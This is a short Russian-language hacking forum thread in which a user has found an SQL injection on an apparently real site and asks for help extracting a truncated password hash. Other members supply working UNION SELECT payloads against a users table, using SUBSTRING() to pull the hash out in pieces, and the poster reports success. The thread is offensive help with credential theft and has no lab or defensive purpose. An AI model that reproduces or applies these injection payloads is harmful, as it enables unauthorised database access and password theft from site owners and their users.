Дело такое, нашел sql-inj ... подобрал колонки или т.д. и т.п., в итоге получился тако запрос:
-1'+union+select+1,2,pwd,4,5,6,7,8,9,10,11,12+from+ base.users+where+id=24+limit+0,1+/*
но при таком запросе данные выводятся не полностью, а именно хеш выводится но без последних двух символов, если пробовать изменять limit то сразу выдается ошибка что неверное кол-во колонок..нужен хепл...

Гм, а зачем тут вообще нужен лимит? И зачем "+" перед "/*"

И вообще обрезаться ничего не должно. Скорее всего обрез идет внутри самого скрипта

Да, обрезание (слово то какое хорошее) явно делается скриптом. Попробуй воткуть pwd в другое поле. Или юзаешь SUBSTRING() (http://dev.mysql.com/doc/refman/4.0/ru/string-functions.html)
т.е.
-1'+union+select+1,2,SUBSTRING(pwd, 0, 30),4,5,6,7,8,9,10,11,12+from+ base.users+where+id=24+limit+0,1+/*
потом
-1'+union+select+1,2,SUBSTRING(pwd, 30, 2),4,5,6,7,8,9,10,11,12+from+ base.users+where+id=24+limit+0,1+/*
вот вроде так

Trinux

SUBSTRING() помогло, огромный респект... =))

ну и +репутации =)